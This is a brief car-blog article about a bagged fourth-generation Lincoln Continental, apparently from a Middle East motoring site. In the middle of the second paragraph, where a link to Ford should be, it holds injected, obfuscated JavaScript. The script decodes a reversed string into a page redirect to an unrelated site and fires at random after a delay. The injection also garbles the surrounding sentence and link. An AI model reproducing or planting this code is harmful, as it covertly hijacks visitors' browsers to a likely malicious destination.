Lincoln Continental. 4th Generation. In The Bag-ged

A fourth generation Lincoln Continental is a rarity in the Middle East, especially a bagged example rolling on white wall tyres.

Hard to believe, give or take an eight-year hiatus here or there, that the Lincoln Continental has been with us for over 70 years. Well, I say ‘with us’. Those of us born on the other side of the Atlantic weren’t exactly tripping over examples on our way to school, Mondeos and Sierras more our style of family movers back in the day.

Even today in the Middle East, a Lincoln – surrounded as it is by Explorers and Edges from parent company $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/tags/ford/” target=”_blank”>Ford – is still something of a rarity. Unsurprisingly then, a Continental is always going to raise a couple of eyebrows when it slips onto our radar, especially a white-walled bagged example like this.

The school run would probably have been a lot more interesting.
